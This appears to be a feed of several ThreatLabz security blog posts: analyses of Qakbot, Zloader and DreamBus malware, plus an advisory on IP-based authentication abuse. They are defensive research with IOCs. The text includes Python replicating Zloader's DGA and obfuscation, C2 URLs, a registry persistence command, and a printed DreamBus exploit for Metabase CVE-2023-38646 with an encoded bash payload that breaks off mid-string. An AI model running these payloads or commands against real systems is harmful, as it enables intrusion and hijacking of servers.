formatCommandsIn the first versions of Qakbot, the server sent commands in a descriptive text-based format. The following commands were supported in Qakbot versions 1.0 and 2.0:certssaveckkillcksaveclearvarscroncronloadcronsaveforceexecftpworkgetipinstall3instwdkillkillallloadconfnbscanpsdumpreloadrmsaveconfsleepsockssxordecsxorencsysinfothkillthkillalluninstallupdateupdate_finishuploaddatavarwgetIn order to obfuscate these commands, the Qakbot author replaced these string commands with integer values starting in the later builds of version 3.Addition of RSA signature verificationQakbot version introduced RSA digital signatures (initially using the MatrixSSL library) to prevent tampering. This was especially important when the DGA and compromised systems were used as C2 servers.Modular StructureThe design of Qakbot has changed significantly from versions 1 through 5. In particular, the malware has become more modular with the ability to dynamically add new features without releasing a new version of Qakbot. Modern versions use a lightweight stager responsible for initializing, maintaining persistence, and establishing C2 communication to request commands and modules.Embedded resourcesPrior to version, Qakbot frequently used the resource section to store configuration information (such as web injects and application parameters) as well as DLLs that performed malicious behavior. Initially, in version 1.0, these resources were not encrypted. However, Qakbot’s code evolved with various encryption algorithms to protect these resources.Qakbot version 2.0 implemented a custom XOR-based algorithm as shown in Figure 11.Figure 11. Custom encryption algorithm used by Qakbot 2.0 to protect resourcesIn this example, the offset 0x7 in the encrypted resource contained a WORD that was the size of the XOR key. The XOR key was located at offset 0x9 in the resource. Encrypted data was then concatenated after the XOR key. Python code that replicates this algorithm is shown below:import struct def custom_xor(data, key): out = b"" for i, eb in enumerate(data): v6 = eb ^ key[i % len(key)] v1 = (v6 & (0xff&(255 >> (8 - (i & 7))))) << (8 - (i & 7)) v2 = (v6 >> (i & 7)) v3 = v1 | v2 out += struct.pack("B", v3) return out s = open('res.bin', 'rb').read() key_sz = struct.unpack('H', s[7:9])[0] s = custom_xor(s[9+key_sz:], s[9:9+key_sz]) print(s)Qakbot version 3.0 and later used an RC4-based algorithm to decrypt the resources. The initial 0x14 bytes in the resource served as the RC4 key for decrypting the remaining data. A slightly modified version of the BriefLZ library was later added to compress specific resources to reduce the overall file size.In version, the resource encryption algorithm changed slightly. The first 0x14 bytes of the resource were no longer used as an RC4 key. Instead, the code contained a salt value in the encrypted strings table that was then hashed using SHA1 to derive the RC4 key used to decrypt the resource. In version this was improved again, which added two layers of RC4 to decrypt the resource. The first RC4 layer was decrypted using the SHA1 hash of the salt string. The second layer used the first 0x14 bytes of the result as the key to decrypt the following data. Example Python code for this algorithm is shown below:seed = b"Muhcu#YgcdXubYBu2@2ub4fbUhuiNhyVtcd" key = SHA1(seed).digest() dec_data = RC4(resource_data, key)[0x14:] data = RC4(dec_data[0x14:], dec_data[0:0x14])[0x14:]PluginsIn version 4.0.1, Qakbot was modified to split various functionality into separate modules. This allowed Qakbot to use a stager to download additional modules from Qabkot’s C2 servers to add functionality on-demand. Qakbot has built modules to hook web browsers, steal email addresses (and email), harvest stored credentials, deploy Cobalt Strike, and act as a C2 server that relays traffic between other infected systems and the backend infrastructure.Conclusion Qakbot is a sophisticated trojan that has evolved significantly over the past 15 years, and remains remarkably persistent and resilient. Despite the significant disruption to Qakbot in August 2023, the threat group remains active and recently updated their codebase to support 64-bit versions of Windows, improved the encryption algorithms, and added more obfuscation. This demonstrates that Qakbot will likely remain a threat for the foreseeable future and ThreatLabz will continue to add detections to protect customers. Zscaler Cloud Sandbox Zscaler’s multilayered cloud security platform detects payloads with the following threat names: Win32.Banker.Qakbot Indicators Of Compromise (IOCs) Date Version Sample Hash 2008-08-28 1.0.0 34588857312371e4b789fb49d2606386 2009-11-16 1.0.0 8c33780752e14b73840fb5cff9d31ba1 2009-12-29 1.0.0 37bbdaf1d14efa438f9ff34d8eeaa5e7 2010-10-12 d02252d88c3eab14488e6b404d2534eb 2011-05-12 b9e23bc3e496a159856fd60e397452a0 2012-05-31 570547fa75c15e6eb9e651f2a2ee0749 2013-07-08 42e724dc232c4055273abb1730d89f28 2014-06-24 9160ea12dbce912153b15db421bb87da 2015-01-28 945ba16316c8a6a8428f0b50db0381dc 2015-12-17 dca0ef26493b9ac3172adf931f1a3499 2016-01-04 6718c6af4b89cffd9b6e0c235cf85bd2 2016-01-04 8fbb43dc853d0b95829112931493fe22 2016-01-13 72125013ac58d05adb32b7406b02c296 2016-01-29 3b4a2e984a51210d0594c9b555ba4e0d 2016-02-09 f952dc1e942ebdfb95a2347263265438 2016-02-12 b849381ab6a4e97d32580bb52d15cb7d 2016-03-08 dc8b137d5d61b23dbbb6085ce46bfcdb 2016-04-05 327a5e491d6db899d9db4c6bdc8f5367 2016-04-05 e3b0e54777ca9fd9863e3563a1b7dd59 2016-04-06 2e9261e75e15540ef88327a480a5b10e 2016-04-26 a472b9dd64198d739c6e415bbcae8a6f 2016-05-19 8609e6e4d01d9ef755832b326450cbe9 2016-06-01 a7cc19cde3a1a78b506410e4ffafdbef 2017-04-27 581016035f95327e7e1daac3ad55ae0e 2017-05-16 361d46f32a93786b34b2ac225efc0f79 2018-02-06 89e6f171c29255d6b4490774c630ad14 2019-09-16 ff186a1ef9e83c229940ff2dd4556eaf 2020-01-22 bea66da7088bd20adbfed57cf350a6a4 2020-01-22 1cd7a95064515625ad90464a65ea4d94 2020-03-03 08c51514a42eec6ccbbc7a09a8258419 2020-03-20 d8ff9d18cd622c545d21b199a2d17594 2020-04-01 2e658f5fa658651331cb5b16447bdbe2 2020-04-29 ca22283396dbe21fa2ef5e27c85ffae6 2020-05-07 e9d0e767a5c5284ab33a3bb80687cf63 2020-05-07 d8841201c9d32b5e885f4d035e32f654 2020-05-28 82d7c5ea49c97059bbec02161b36f468 2020-08-07 163ee88405bccc383c7b69c39028bf9a 2020-08-07 acf65632b7cdc40091daec58bf8830bc 2020-08-11 455c543243f5216e21ba045814311971 2020-08-11 cfc77e4421d830e73c6f6040a4baedd4 2020-11-03 40a9bdac882285ab844917d8b5b75188 2020-11-24 6b1771b883c0b3ffdc3f5923f45c1f93 2020-12-15 0a3caa2845251b8fb5ab72f450edd488 2021-03-12 4a6e7f055d5bf4fd6d2a401c1b3d18ab 2021-04-12 dc2acf1704456880208146c91692cfc8 2021-04-15 3ca1f0e708283f21c9a10ef4acf40990 2021-04-15 1e71ea79c5a70bb8c729037132855b5a 2021-04-22 66a87dbc24af866849646911f4841a28 2021-04-29 25984af48fa27ec36bd257f8478aa628 2021-04-29 c1849c1ee3b8146c6fb836dae0b64652 2021-05-06 d45e04df3c9270a01e9fb9e4e8006acc 2021-09-20 9a1c1497428743b4e199f2583f3d8390 2021-09-27 0865757dfe54c2d01c5cef5bfd3162c5 2021-09-27 c6dea1f4e6ee1ed4c0383cd1af456649 2021-11-03 1d4952cbe998312fd2bf810535db8a20 2021-11-03 6cce1ec83d1428de9fcb0c3791efabd1 2021-11-04 e111d982dc0c12f23fa3f446d674600b 2021-11-04 751f7d8ad6b2308cd1750fc23f606b53 2021-12-09 8bb4208a50c041f9cdfc26815905eab3 2022-02-10 bcb8e64c5a69c7a572ca34450712fb2f 2022-02-14 54e3f20f74c1089e89841798ffaac084 2022-02-14 95adeb6a1c1e0a9d9ee4ecafb6079b37 2022-02-15 da206d25fddf3286f42ec7626d8bb676 2022-02-18 3ba490216d4cdf92661444d896fefac3 2022-02-24 8fa26ff07c3b5e1653e55b8a567b7623 2022-02-24 1253695c63136edb1f6b37bbfd83db55 2022-04-06 2853985cab3c5b83eec38ae1f3a890be 2022-04-29 5e7deb4acb4429498693bc45db68978a 2022-05-04 2273dd59ca71c4f078cab09d93093294 2022-05-04 40d5e775a52c94842c97d012eb94efdc 2022-05-04 f1d47a4dc1d11b17e51419299dc282e4 2022-05-12 2f17bd9f4b9edd91a7fd80ef32981f70 2022-05-18 7dcbd74778754eee85810a4393d8e3ef 2022-05-18 e9e9d194f3ee9822852309cc83455eea 2022-05-23 019117f66e43de489b3ff56377f9907b 2022-05-24 28f84ffa14c7ef3936a00d3bd751bdb3 2022-06-07 d88ee89344d04f83eacd3614785560ef 2022-08-31 3ff9d9dbf8c7a6865faeb43188afa6b4 2022-09-06 3e86ac10b4e7d818e0f410130bb7f237 2022-09-08 377acb7149fdfa56c090d9a12619a53c 2022-09-15 e5ebdec7417ad847e4325c4114e41809 2022-09-20 c23d2cd7d10a5f88032ddfcab4cfe146 2022-09-28 050ce5fb25ffd3e907a5c81a6711fcea 2022-10-04 b857efb30d9e35bc83a294580ad8cc3a 2022-10-10 6dc027269262b93351633eb8af4623ef 2022-10-11 e5eb07b009ca666f91ef5fe48269ca52 2022-10-25 0971b8e78fcc6f9158e279376116c8c4 2022-10-26 4fbebc9879ec1f95e759cb8b5d9fb89d 2022-10-28 66a0741f8f43b584e387459b367097c1 2022-10-31 6d61a88890be4ab5116cb712ff7788f4 2022-11-08 da75924c717524a8d17de126f8368ec4 2022-11-08 5971c4a485e881268ca28f24fdedc4e5 2022-11-16 22e45a212998d2ee264b6756b2972901 2022-11-28 accc6d9ba88040c89df34ef1749944d1 2022-12-13 22b3cb9b0bacd525a83aab5b1a853f63 2022-12-20 bebebd4e16a88f43f16e4c6c811c9894 2022-12-20 cafb7b2f8383cf9686f144dc2082f287 2022-12-22 6e3b4252903c0f3a153e011445ad2179 2023-01-31 3e3bc981a7fdbae10b40cd6683edacbb 2023-01-31 a12dd4324bbf1129d9fae1b3d1e6b9ca 2023-05-02 ebec03d53d716cd780c92c5c29a95e6b 2023-05-10 5e4c95b2c1b14a8a0f425576189fae60 2023-12-11 8aec3f3ef66e4ff118bfdab1d031eadb 2023-12-13 46e169516479d0614b663f302b5d1ace 2023-12-19 795319d48ce1f680699beb03317c6bff 2024-01-22 de1d9ed6da4f34b4444b13442aac5033 2024-01-22 f382d0f92221831eeb39c108f8ccfa26 Wed, 31 ene 2024 08:31:01 -0800 Javier Vicente Zloader: No Longer Silent in the Night Introduction Zloader (aka Terdot, DELoader, or Silent Night), is a modular trojan born from the leaked Zeus source code. It surfaced publicly in 2016 during a targeted campaign against German banks1, but its malicious activity traces back to at least August 2015. Zloader’s first run persisted until the beginning of 2018 when its activities abruptly ceased. Its resurgence at the end of 2019, marketed in underground forums as “Silent Night”, came with substantial alterations. The evolution of Zloader progressed steadily, leading to the development of version around September 2021. Similar to Qakbot, the threat actors using Zloader also pivoted from conducting banking fraud to ransomware. In April 2022, security researchers executed a takedown operation2 to dismantle the botnet leading to an extended period of inactivity. After an almost two-year hiatus, Zloader reemerged with a new iteration that appears to have started development in September 2023. These new changes include new obfuscation techniques, an updated domain generation algorithm (DGA), RSA encryption for network communications, and the loader now has native support for 64-bit versions of Windows. Initially, this new version was labeled with the old version number However, over the past several months, they released version and In this blog, we will explore these new updates to Zloader. Key Takeaways Zloader dates back to 2015 and has been advertised in underground cybercriminal forums under the name “Silent Night” since the end of 2019. Zloader has returned after an almost two-year hiatus after being taken down in April 2022 by security researchers. The new version of Zloader made significant changes to the loader module, which added RSA encryption, updated the domain generation algorithm, and is now compiled for 64-bit Windows operating systems for the first time. Zloader continues to use junk code for obfuscation, as well as API import hashing and string encryption in an attempt to hinder malware analysis. Technical AnalysisIn the following sections, we dive into the technical details surrounding Zloader’s new updates to their anti-analysis techniques, embedded configuration, DGA, and network encryption.Anti-analysis techniquesZloader uses a combination of API import hashing, junk code, a filename check, and string obfuscation. The following sections analyze each technique.Imports and API resolutionThe newest Zloader samples only import a few functions from the kernel32 library. The remaining imports are resolved at runtime using checksums to obfuscate the functions that are used. This technique, already present in older versions, changes its implementation, adding an XOR constant which changes between samples. Python code that replicates the API hashing algorithm is shown below.def calculate_checksum(func_name, xor_constant): checksum = 0 for element in func_name.upper(): checksum = 16 * checksum - (0 - (ord(element)+1)) if checksum & 0xf0000000 != 0: checksum = ((((checksum & 0xf0000000) >> 24) ^ checksum) & 0xfffffff) return checksum ^ xor_constantCode sample available on GitHub.Junk code Similar to previous versions, Zloader uses custom obfuscation. The new version of Zloader adds junk code that consists of various arithmetic operations, as shown in Figure 1 below.Figure 1. Example Zloader 2.1 junk codeIn Figure 1, the instructions inside the red box are the junk code.Anti-sandboxEach Zloader sample expects to be executed with a specific filename. If the filename does not match what the sample expects, it will not execute further. This could evade malware sandboxes that rename sample files. Figure 2 shows an example of a Zloader sample that expects its filename to be CodeForge.exe.Figure 2. Example of Zloader’s anti-analysis filename checkThreatLabz has observed Zloader use the following filenames:CodeForge.exeCyberMesh.exeEpsilonApp.exeFusionBeacon.exeFusionEcho.exeIonBeacon.dllIonPulse.exeKineticaSurge.dllQuantumDraw.exeSpectraKinetic.exeUltraApp.exeString obfuscationSimilar to prior versions, Zloader implements a string obfuscation algorithm for some of the malware’s important strings such as registry paths, DLL names, and the DGA’s top-level domain (TLD) using XOR with a hardcoded key. Python code that replicates the string obfuscation algorithm is shown below:def str_deobfuscate(enc_bin, enc_key): res = '' for i, element in enumerate(enc_bin): res += chr( ((element ^ 0xff) & (enc_key[i % len(enc_key)])) | (~(enc_key[i % len(enc_key)]) & element)) return res Code sample available on GitHub. The encryption key differs between samples and is also hardcoded in the .rdata section as shown in Figure 3 below.Figure 3. Example string obfuscation key used by ZloaderA list of Zloader’s obfuscated strings is shown in the Appendix.Static configuration encryption and structureThe Zloader static configuration is still encrypted using RC4 with a hardcoded alphanumeric key, but the structure is slightly different. The botnet ID, campaign name, and command-and-control servers (C2s) are set at fixed offsets, in addition to an RSA public key that replaces the old RC4 key that was used for network encryption. ThreatLabz has observed 15 unique new Zloader samples and all of them have the same RSA public key, likely indicating there is currently only a single threat actor using the malware.An example Zloader static configuration is shown below.00000000 00 00 00 00 42 69 6e 67 5f 4d 6f 64 35 00 00 00 |....Bing_Mod5...| 00000010 00 00 00 00 00 00 00 00 00 4d 31 00 00 00 00 00 |.........M1.....| 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 74 || 00000030 74 70 73 3a 2f 2f 61 64 73 6c 73 74 69 63 6b 65 |tps://adslsticke| 00000040 72 68 69 2e 77 6f 72 6c 64 00 00 00 00 00 00 00 || 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000002b0 00 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 |................| 000002c0 2d 2d 2d 2d 2d 42 45 47 49 4e 20 50 55 42 4c 49 |-----BEGIN PUBLI| 000002d0 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 66 4d |C KEY-----.MIGfM| 000002e0 41 30 47 43 53 71 47 53 49 62 33 44 51 45 42 41 |A0GCSqGSIb3DQEBA| 000002f0 51 55 41 41 34 47 4e 41 44 43 42 69 51 4b 42 67 |QUAA4GNADCBiQKBg| 00000300 51 44 4b 47 41 4f 57 56 6b 69 6b 71 45 37 54 79 |QDKGAOWVkikqE7Ty| 00000310 4b 49 4d 74 57 49 38 64 46 73 61 0a 6c 65 54 61 |KIMtWI8dFsa.leTa| 00000320 4a 4e 58 4d 4a 4e 49 50 6e 52 45 2f 66 47 43 7a |JNXMJNIPnRE/fGCz| 00000330 71 72 56 2b 72 74 59 33 2b 65 78 34 4d 43 48 45 |qrV+rtY3+ex4MCHE| 00000340 74 71 32 56 77 70 70 74 68 66 30 52 67 6c 76 38 |tq2Vwppthf0Rglv8| 00000350 4f 69 57 67 4b 6c 65 72 49 4e 35 50 0a 36 4e 45 |OiWgKlerIN5P.6NE| 00000360 79 43 66 49 73 46 59 55 4d 44 66 6c 64 51 54 46 |yCfIsFYUMDfldQTF| 00000370 30 33 56 45 53 38 47 42 49 76 48 71 35 53 6a 6c |03VES8GBIvHq5Sjl| 00000380 49 7a 37 6c 61 77 75 77 66 64 6a 64 45 6b 61 48 |Iz7lawuwfdjdEkaH| 00000390 66 4f 6d 6d 75 39 73 72 72 61 66 74 6b 0a 49 39 |fOmmu9srraftk.I9| 000003a0 67 5a 4f 38 57 52 51 67 59 31 75 4e 64 73 58 77 |gZO8WRQgY1uNdsXw| 000003b0 49 44 41 51 41 42 0a 2d 2d 2d 2d 2d 45 4e 44 20 |IDAQAB.-----END | 000003c0 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a |PUBLIC KEY-----.| 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000003fc Domain generation algorithmWhen the primary C2 server is not available, Zloader reverts to a DGA. The DGA algorithm has changed in the latest version and no longer contains a different seed per botnet. Python code that replicates Zloader’s new DGA algorithm is shown below.import time from datetime import datetime, timedelta def uint32(val): return val & 0xffffffff def get_dga_time(): now = ts = time.time() utc_offset = (datetime.fromtimestamp(ts) - datetime.utcfromtimestamp(ts)).total_seconds() / 3600 midnight = now.replace(hour=0, minute=0, second=0, microsecond=0) midnight = midnight + timedelta(hours=utc_offset) return int(midnight.timestamp()) def generate_zloader_dga_domains(): domains = [] t = get_dga_time() for i in range(32): # number of domains to generate domain = "" for j in range(20): # domain name length v = uint32(ord('a') + (t % 25 )) t = uint32(t + v) t = (t >> 24) & ((t >> 24) ^ 0xFFFFFF00) | uint32(t << 8) domain += chr(v) domains.append(domain+".com") return domains Code sample available on GitHub.The code generates 32 domains per day by using the local system time at midnight (converted to UTC) as a seed. Each of the DGA domains have a length of 20 characters followed by the “.com” TLD.Network communicationsZloader continues to use HTTP POST requests to communicate with its C2 server. However, the network encryption is now using 1,024-bit RSA with RC4 and the Zeus “visual encryption” algorithms. Zloader uses the custom Zeus BinStorage format where the first 128 bytes are the RSA encrypted RC4 key (32 random bytes) and, the remaining bytes are encrypted with the RC4 key and visual encryption as shown in Figure 4:Figure 4. Zloader BinStorage object for a hello message (prior to encryption)The Zeus BinStorage structure uses an ID integer value to represent the information stored, followed by the length and data. The BinStorage ID values in this example are shown in Table 1.Value (Decimal)Value (Hexadecimal)Description100020x2712Botnet ID100250x2729Campaign ID100010x2711Bot ID100030x2713Malware version100060x2716Unknown flag (set to 0x1)Table 1. Zloader BinStorage hello message fieldsThreatLabz has observed samples containing the following botnet IDs:Bing_Mod2Bing_Mod3Bing_Mod4Bing_Mod5All of the campaign IDs have been set to the value M1.Conclusion Zloader was a significant threat for many years and its comeback will likely result in new ransomware attacks. The operational takedown temporarily stopped the activity, but not the threat group behind it. Returning after almost two years, Zloader has brought notable improvements to the loader module such as RSA encryption, an updated DGA, and enhanced obfuscation techniques, with more junk code, API import hashing, and string encryption to thwart malware analysis. Zscaler ThreatLabz continues to track this threat and add detections to protect our customers. Zscaler Coverage In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Zloader at various levels with the following threat names: Win64.Downloader.Zloader Indicators Of Compromise (IOCs) SHA256 Description 038487af6226adef21a29f3d31baf3c809140fcb408191da8bc457b6721e3a55 Zloader sample 16af920dd49010cf297b03a732749bb99cc34996f090cb1e4f16285f5b69ee7d Zloader sample 25c8f98b79cf0bfc00221a33d714fac51490d840d13ab9ba4f6751a58d55c78d Zloader sample 2cdb78330f90b9fb20b8fb1ef9179e2d9edfbbd144d522f541083b08f84cc456 Zloader sample 83deff18d50843ee70ca9bfa8d473521fd6af885a6c925b56f63391aad3ee0f3 Zloader sample 98dccaaa3d1efd240d201446373c6de09c06781c5c71d0f01f86b7192ec42eb2 Zloader sample adbd0c7096a7373be82dd03df1aae61cb39e0a155c00bbb9c67abc01d48718aa Zloader sample b206695fb128857012fe280555a32bd389502a1b47c8974f4b405ab19921ac93 Zloader sample b47e4b62b956730815518c691fcd16c48d352fca14c711a8403308de9b7c1378 Zloader sample d92286543a9e04b70525b72885e2983381c6f3c68c5fc64ec1e9695567fb090d Zloader sample eb4b412b4fc58ce2f134cac7ec30bd5694a3093939d129935fe5c65f27ce9499 Zloader sample f03b9dce7b701d874ba95293c9274782fceb85d55b276fd28a67b9e419114fdb Zloader sample f6d8306522f26544cd8f73c649e03cce0268466be27fe6cc45c67cc1a4bdc1b8 Zloader sample fa4b2019d7bf5560b88ae9ab3b3deb96162037c2ed8b9e17ea008b0c97611616 Zloader sample fbd60fffb5d161e051daa3e7d65c0ad5f589687e92e43329c5c4c950f58fbb75 Zloader sample URL Description https://adslstickerhi[.]world Zloader C2 https://adslstickerni[.]world Zloader C2 https://dem.businessdeep[.]com Zloader C2 Appendix Tools The code snippets in this blog have also been uploaded to our GitHub tools repository here. Decoded strings user32.dll nbsp; %s reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v %s /d "%s" wininet.dll td tr br Software\Microsoft\ h3 Local\ hr POST gdiplus.dll NtWriteVirtualMemory https:// * \??\ ntdll.dll ws2_32.dll _alldiv NtProtectVirtualMemory NtGetContextThread shell32.dll %s %s psapi.dll crypt32.dll S-1-15 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ _aulldiv \"%s\" samlib.dll S:(ML;CIOI;NRNWNX;;;LW) NtCreateThreadEx regsvr32.exe /s \"%s\" NtResumeThread bcrypt.dll netapi32.dll RtlGetVersion strtoul winsta.dll wldap32.dll NtReadVirtualMemory Basic 0:0 version.dll h2 InstallDate h5 NtAllocateVirtualMemory .com cabinet.dll S:(ML;;NRNWNX;;;LW) li kernel32.dll %s\tmp_%08x h6 aeiouy div rpcrt4.dll {%08X-%04X-%04X-%08X%08X} iphlpapi.dll mpr.dll C:\Windows\System32\ntdll.dll Connection: close gdi32.dll C:\Windows\System32\msiexec.exe Global\ wtsapi32.dll NtCreateUserProcess shlwapi.dll RtlUserThreadStart %s NtOpenProcess HTTP/1.1 ncrypt.dll INVALID_BOT_ID _aullrem Software\Microsoft\Windows\CurrentVersion\Run dnsapi.dll ole32.dll .dll C:\Windows\SysWOW64\msiexec.exe bcdfghklmnpqrstvwxz ftllib.dll User metrics ThreadStart MSIMG32.dll \* JKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq h1 NtSetContextThread */* GET userenv.dll urlmon.dll Software\Microsoft\Windows NT\CurrentVersion _ThreadStart@4 dxgi.dll NtOpenSection script /post.php advapi32.dll h4 secur32.dll imagehlp.dll %s_%s_%X winscard.dll References 1 The Curious Case of an Unknown Trojan Targeting German-Speaking Users 2 Dismantling ZLoader: How malicious ads led to disabled security tools and ransomware | Microsoft Security Blog Fri, 19 ene 2024 15:41:37 -0800 Santiago Vicente ThreatLabz Security Advisory: Rise in Source IP-Based Authentication Abuse - Jan 19, 2024 Introduction The Zscaler ThreatLabz team is seeing an increase in attacks that abuse IP-based authentication and target global organizations. Attackers are actively exploiting the limitations and weaknesses of IP-based authentication methods, posing a significant challenge for organizations. Successful attacks can lead to unauthorized system access, data breaches, and the potential compromise of critical assets. In this advisory, we share information about risk exposure and best practices for organizations to defend against these attacks. Key Takeaways Zscaler ThreatLabz has observed an increase in source IP-based authentication abuse leveraging system compromise, identity compromise, and shadow IT environments, to name a few examples. Employing a Zero Trust architecture, along with other security best practices, in managing your identities and multi-factor authentication (MFA) configuration is paramount to establishing a robust security posture and effectively mitigating the risks associated with unauthorized access and data breaches. Further mitigate IP-based authentication vulnerabilities by implementing an identity provider (IdP) with FIDO2-based MFA and reinforcing user account reset processes. Background Organizations employ various methods to restrict access to sensitive data and systems. Source IP-based authentication is a commonly used method that provides a straightforward and quick way to control access. However, if IP-based authentication is one of the primary authentication mechanisms, it also introduces additional risk factors. IP-based authentication can: Be difficult to scale as the organization grows in size and complexity. Prevent the implementation of granular access controls. Reduce the sophistication and level of effort that threat actors must leverage to access organizational assets. Introduce challenges in auditing access and activity. Examples Of IP-Based Authentication Abuse Threat actors use many methods to bypass source IP-based authentication. The following examples describe recently observed common attack vectors: System compromise: Compromising local system credentials or installing malware gives an attacker access to a system that can be allowlisted to multiple sensitive systems. Wi-Fi networks: By relying on source IP-based authentication, organizations are at a higher risk of unauthorized access due to vulnerabilities or misconfigurations in wireless networks. Identity compromise: Identity compromise can occur when threat actors use social engineering to manipulate help desk personnel, posing as legitimate users. Through this deception, they aim to gain initial access. Once inside, a threat actor can exploit the limitations of IP-based authentication, allowing them to move laterally within the system. Physical access: When a threat actor gains physical access to an office or data center, they are free to access sensitive systems because they now have an authorized IP address. Misconfiguration: Source IP-based authentication relies on accurate network definitions, and it is easy to introduce risk by exposing sensitive systems to uncontrolled IP spaces. Shadow IT: Unmanaged shadow IT environments are common and introduce additional risk because IP-based authentication might not discern between managed and unmanaged environments. Best Practices To Safeguard Against These Attacks Although source IP filtering can serve as an additional layer of security, it should NOT be relied upon for authentication. By implementing the following measures and best practices, organizations can safeguard their sensitive systems and data, as well as identify and bolster the efficacy of their environments. 1. Move all crown-jewel applications behind Zero Trust solutions Move all crown-jewel applications behind Zero Trust solutions such as Zscaler Private Access™ (ZPA™), and prioritize user-app segmentation for sensitive applications to proactively defend against these attacks. Zero Trust solutions can help you: Deploy role-based access controls, providing granular access based on the user’s role to prevent access to unnecessary systems and limit risk. Enforce posture control to ensure that only approved systems with a full endpoint security stack can communicate with sensitive applications. Establish strong Data Loss Prevention (DLP) policies to control access and prevent exfiltration of sensitive information. The key principles of a Zero Trust architecture ensure that you never trust and always verify. Organizations that implement a Zero Trust solution like Zscaler are able to: Minimize the attack surface by making internal apps invisible to the internet. Prevent compromise by using cloud-native proxy architecture to inspect all traffic inline and at scale, enforcing consistent security policies. Stop lateral movement by connecting authorized users to applications rather than connecting networks to applications, which reduces the attack surface through strong posture check and workload segmentation. Stop data loss by inspecting all internet-bound traffic, including encrypted channels, to prevent data theft. Identify threats by leveraging deception technologies to stop attacks before an attacker’s objectives are accomplished. 2. Use an IdP with FIDO2-based MFA Using an IdP with FIDO2-based MFA for authentication offers numerous advantages over relying solely on local accounts. IdPs provide centralized control and management of your administrator identities, which streamlines the authentication process and ensures consistency across applications and services. It also: Simplifies user access management, which saves time and reduces mistakes. Enables the implementation of single sign-on (SSO), allowing users to authenticate once and access applications securely, thus enhancing the user experience and eliminating the risk of weak or reused passwords. Offers additional security features such as MFA and adaptive authentication, which provide additional defenses against unauthorized access. 3. Strengthen processes around user account resets Strengthen processes around user account resets by training help desk personnel to perform strong user identity validation. You can: Leverage corporate directory contact information to perform callbacks that ensure user identities before resetting access. Require managers to personally validate identities when standard validation techniques are not possible. Conclusion The Zscaler ThreatLabz and Product Security teams continuously monitor threat trends and share their findings with customers and the wider community. If you have any questions, please reach out using the official support channel. Fri, 19 ene 2024 08:00:01 -0800 Dhaval Parekh DreamBus Unleashes Metabase Mayhem With New Exploit Module Introduction Zscaler’s ThreatLabz research team has been tracking the Linux-based malware family known as DreamBus. Not much has changed in the last few years other than minor bug fixes, and slight modifications to evade detection from security software. However, in the last 6 months, the threat actor operating DreamBus has introduced two new modules to target vulnerabilities in Metabase and Apache RocketMQ. This is likely in response to a decrease in new infections stemming from exploits utilized by DreamBus, many of which are dated and have been in use for several years. DreamBus also continues to use techniques that exploit implicit trust and weak passwords including Secure Shell (SSH), IT administration tools, cloud-based applications, and databases. The primary monetization vector for DreamBus infections is still through mining Monero cryptocurrency. Key Takeaways DreamBus is a modular Linux-based botnet dating back to early 2019 with worm-like behavior that can spread across the internet as well as internal networks. DreamBus uses a combination of implicit trust, application-specific exploits, and weak passwords to gain access to systems such as databases, cloud-based applications, and IT administration tools. Infected systems are monetized by mining Monero cryptocurrency using XMRig. In June 2023, the DreamBus malware author introduced new changes to the code to further evade detection. The threat actor developed two new exploit modules that target vulnerabilities in Metabase (CVE-2023-38646) and Apache RocketMQ (CVE-2023-33246). Technical AnalysisZscaler ThreatLabz has previously analyzed DreamBus and its modules. Each DreamBus module is an Executable and Linkable Format (ELF) binary that is packed by UPX with a modified header and footer. This alteration is designed to prevent the UPX command-line tool from statically unpacking DreamBus binaries. The magic bytes UPX! (0x21585055) are typically replaced with values that change over time. In recent DreamBus samples, the UPX magic bytes have been replaced with the value .gnu (0x756e672e). DreamBus modules all have a very similar structure. The main difference between each module is the exploit code. Each module scans for servers listening on specific ports, performs exploitation, and if successful, executes shell scripts that download the main DreamBus module, which in turn deploys XMRig to mine Monero cryptocurrency. Each exploit module creates a lock file named /tmp/.systemd.3 to ensure that only one instance is running at a time. Each exploit module scans internal RFC 1918 ranges,, and as well as randomly scanning public IP ranges.Over the last 6 months, ThreatLabz observed DreamBus deploy modules for the following applications:Metabase (CVE-2023-38646)RocketMQ (CVE-2023-33246)HashiCorp ConsulHadoop YARNRedisPostgreSQLSSHThe most commonly deployed DreamBus modules target PostgreSQL. Links to the current password lists used by DreamBus to brute force Redis, PostgreSQL, and SSH credentials are provided in the Appendix.In this blog, we analyze the two exploit modules for Metabase and RocketMQ that were added recently.Metabase Exploit Module (CVE-2023-38646)Metabase is a popular business intelligence tool used to analyze and visualize data. The open source versions of Metabase and earlier, as well as Metabase Enterprise and earlier, are vulnerable to CVE-2023-38646, which was first documented in July 2023. The vulnerability allows an attacker to execute arbitrary commands on the server. The DreamBus exploit targeting the vulnerability is likely based on an open source proof-of-concept.The first step is to scan for Metabase servers listening on port 3000 by sending the following HTTP request:GET /api/session/properties HTTP/1.1 Host: DreamBus module checks the response for the string metabase.D to identify whether the server is running Metabase. This string is likely attempting to identify the metabase.DEVICE cookie value. If this string is found, DreamBus stages the exploit by writing the following content to the file /tmp/.json%s (where the format %s string is the IP address of the Metabase server).{ "token": "setup-token", "details": { "is_on_demand": false, "is_full_sync": false, "is_sample": false, "cache_ttl": null, "refingerprint": false, "auto_run_queries": true, "schedules": {}, "details": { "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;", "advanced-options": false, "ssl": true, "init": "CREATE TRIGGER metabasex BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,dmtIenJnCmV4ZWMgJj4vZGV2L251bGwKTEhqRmd4dG49Li8uJChkYXRlfG1kNXN1 bXxoZWFkIC1jMjApCnVQWEFpRGdwPShkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYW 